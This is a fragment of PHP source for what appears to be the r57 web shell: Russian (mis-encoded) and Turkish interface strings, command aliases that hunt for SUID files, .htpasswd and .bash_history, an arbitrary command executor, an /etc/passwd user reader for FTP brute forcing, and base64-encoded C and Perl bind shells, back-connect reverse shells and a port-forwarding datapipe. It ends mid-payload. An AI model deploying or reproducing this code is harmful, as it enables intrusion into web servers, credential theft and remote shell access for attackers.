'ru_text84'=>'SQL çàïðîñ',
'ru_text85'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç âûïîëíåíèå êîìàíä â M
'ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåðâåðà',
'ru_butt14'=>'Ñêà÷àòü',
'ru_text87'=>'Ñêà÷èâàíèå ôàéëîâ ñ óäàëåííîãî ftp-ñåðâåðà',
'ru_text88'=>'FTP-ñåðâåð:ïîðò',
'ru_text89'=>'Ôàéë íà ftp ñåðâåðå',
'ru_text90'=>'Ðåæèì ïåðåäà÷è',
'ru_text91'=>'Àðõèâèðîâàòü â',
'ru_text92'=>'áåç àðõèâàöèè',
'ru_text93'=>'FTP',
'ru_text94'=>'FTP-áðóòôîðñ',
'ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé',
'ru_text96'=>'Íå óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé',
'ru_text97'=>'Ïðîâåðåíî êîìáèíàöèé: ',
'ru_text98'=>'Óäà÷íûõ ïîäêëþ÷åíèé: ',
'ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd',
'ru_text100'=>'Îòïðàâêà ôàéëîâ íà óäàëåííûé ôòï ñåðâåð',
'ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåðåâåðíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ï
'ru_text102'=>'Ïî÷òà',
'ru_text103'=>'Îòïðàâêà ïèñüìà',
'ru_text104'=>'Îòïðàâêà ôàéëà íà ïî÷òîâûé ÿùèê',
'ru_text105'=>'Êîìó',
'ru_text106'=>'Îò',
'ru_text107'=>'Òåìà',
'ru_butt15'=>'Îòïðàâèòü',
'ru_text108'=>'Òåêñò ïèñüìà',
'ru_text109'=>'Ñâåðíóòü',
'ru_text110'=>'Ðàçâåðíóòü',
'ru_text111'=>'SQL-Ñåðâåð : ïîðò',
'ru_text112'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç èñïîëüçîâàíèå ôóíêöè
'ru_text113'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ëèñòèíãà äèðåêòî
'ru_text114'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ñîäåðæèìîãî ôàéë
/* --------------------------------------------------------------- */
'eng_text1' =>'Komut uygula',
'eng_text2' =>'Server uzerinde komut uygula',
'eng_text3' =>'Komut calistir',
'eng_text4' =>'Bulunan dizin',
'eng_text5' =>'Servera dosya yukle',
'eng_text6' =>'Yerel dosya',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Uygula',
'eng_butt2' =>'Yukle',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'Arka kapi',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Baglanti',
'eng_text15'=>'Uzak serverdan dosya yukle',
'eng_text16'=>'Ile',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Kullan',
'eng_text21'=>'&nbsp;New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Kullan',
'eng_butt5' =>'Calistir',
'eng_text28'=>'Su anki durum safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Degistir',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Goster',
'eng_text31'=>'Dosya bulunamadi',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text36'=>'Database . Tablo',
'eng_text37'=>'Giris',
'eng_text38'=>'Sifre',
'eng_text39'=>'Database',
'eng_text40'=>'Bosaltilacak database tablosu',
'eng_butt9' =>'Bosalt',
'eng_text41'=>'Bosaltilan dosyayi kaydet',
'eng_text42'=>'Dosyalari duzenle',
'eng_text43'=>'Dosya duzenle',
'eng_butt10'=>'Kaydet',
'eng_text44'=>'Duzenlenemiyor! Sadece okunuyor!',
'eng_text45'=>'Dosya kaydedildi',
'eng_text46'=>'Goster phpinfo()',
'eng_text47'=>'Degiskenleri goster php.ini',
'eng_text48'=>'Temp doslarini sil',
'eng_butt11'=>'Duzenle',
'eng_text49'=>'Serverdan script sil',
'eng_text50'=>'Islemci bilgisine bak',
'eng_text51'=>'Hafýza bilgisine bak',
'eng_text52'=>'Metin ara',
'eng_text53'=>'In dirs',
'eng_text54'=>'Dosyalarin icinde metin ara',
'eng_butt12'=>'Ara',
'eng_text55'=>'Dosyalarda',
'eng_text56'=>'Hicbirsey :(',
'eng_text57'=>'Yarat/Dosya sil/Dir',
'eng_text58'=>'isim',
'eng_text59'=>'dosya',
'eng_text60'=>'dir',
'eng_butt13'=>'Yarat/Sil',
'eng_text61'=>'Dosya yaratildi',
'eng_text62'=>'Dir created',
'eng_text63'=>'Dosya silindi',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Yarat',
'eng_text66'=>'Sil',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Komut',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or U
ID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Metin icin ara',
'eng_text73'=>'Klasor icin ara',
'eng_text74'=>'Dosyalarin icinde ara',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'SQL da sorgula',
'eng_text84'=>'SQL sor',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Serverdan dosya indir',
'eng_butt14'=>'Indir',
'eng_text87'=>'Uzak ftp sunucusundan doysa indir',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'Ftp de dosya',
'eng_text90'=>'Transfer modu',
'eng_text91'=>'Arsivleme',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Kullanici listesi',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre',
'eng_text100'=>'Uzak ftp sunucusuna dosya yolla',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Mail yolla',
'eng_text104'=>'Dosyayi maile yolla',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Yolla',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Goster',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
);
/*
Àëèàñû êîìàíä
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðè
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
*/
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php
',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history
',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'-------------------------------------------------------------------------------
---------------------'=>'ls -la'
);
$table_up1 = "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b><div align=
center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr
><td bgcolor=#3A6EA5>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Wingdings color=gray>è</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
if(isset($_GET['users']))
{
if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange
>".$lang[$language.'_text96']."</font></center>"; }
else
{
echo '<center>';
foreach($users as $user) { echo $user."<br>"; }
echo '</center>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[
'PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
{
if(@eregi("^win",$os)) { $windows = 1; }
else { $unix = 1; }
}
}
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd'])
&& $_POST['cmd'] == "search_text")
{
echo $head;
if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
$sr->SearchText(0,0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if($found > 0)
{
$r .= "<TABLE width=100%>";
foreach($res as $file=>$v)
{
$r .= "<TR>";
$r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
$r .= ($windows)? str_replace("/","\\",$file) : $file;
$r .= "</b></font></ TD>";
$r .= "</TR>";
foreach($v as $a=>$b)
{
$r .= "<TR>";
$r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B
></TD>";
$r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
$r .= "</TR>\n";
}
}
$r .= "</TABLE>";
echo $r;
}
else
{
echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_te
xt56']."</B></font></P>";
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER
['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function get_users()
{
$users = array();
$rows=file('/etc/passwd');
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
function we($i)
{
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
else { $text = "[-] ERROR! Can't write in file "; }
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3A6EA5><fon
t color=orange face=Verdana size=-2><div align=center><b>".$text.$i."</b></div><
/font></td></tr></table>";
return null;
}
function re($i)
{
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
else { $text = "[-] ERROR! Can't read file "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
lor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text
.$i."</b></div></font></td></tr></table>";
return null;
}
function ce($i)
{
if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
else { $text = "Can't create "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
lor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text
.$i."</b></div></font></td></tr></table>";
return null;
}
function fe($l,$n)
{
$text['ru'] = array('Íå óäàëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðâåðó','Îøèáêà àâòîðèçàöèè íà ftp ñåð
$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed'
,'Can\'t change dir on ftp server');
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
lor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text
[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
function mr($l,$n)
{
$text['ru'] = array('Íå óäàëîñü îòïðàâèòü ïèñüìî','Ïèñüìî îòïðàâëåíî');
$text['eng'] = array('Can\'t send mail','Mail sent');
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
lor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text
[$l][$n]."</b></div></font></td></tr></table>";
return null;
}
function perms($mode)
{
if ($GLOBALS['windows']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value)
{
$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\">";
return $ret;
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or we($fname);
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}
}
function sr($l,$t1,$t2)
{
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td c
lass=td1 align=left>".$t2."</td></tr>";
}
if (!@function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB"
;}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}
function DirFilesR($dir,$types='')
{
$files = Array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if($types)
{
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for($a=0;$a<count($dirs);$a++)
$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs
[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal() { return $this->FilesTotal; }
function GetTitles() { return $this->titles; }
function GetTimeTotal() { return $this->TimeTotal; }
function GetMatchesCount() { return $this->MatchesCount; }
function GetFileMatchesCount() { return $this->FileMatchesCount; }
function GetResultFiles() { return $this->ResultFiles; }
function SearchText($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$CurString,$aa)))
{
$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><
b>\\1</b></SPAN>",$CurString);
$this->ResultFiles[$filename][$a+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filename] += $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHV
kZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwX
TsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiBy
ZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0
KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZC
hzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZ
XdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3
cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ
1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZG
VyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0Ka
W50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsg
DQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDs
NCn0=";
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQE
FSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ
3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRz
b2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCB
kaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdC
hDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT
05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2Fu
dCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c
3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJH
VlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWF
kZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
ik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5
c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2l
uY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl
9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpb
l9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJn
dlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19
UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
AgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KI
GR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
ZCk7IA0KfQ==";
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiN
pbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg
0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+D
QojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVu
ZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR
1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA
0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNC
iAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBm
ZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE
7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG
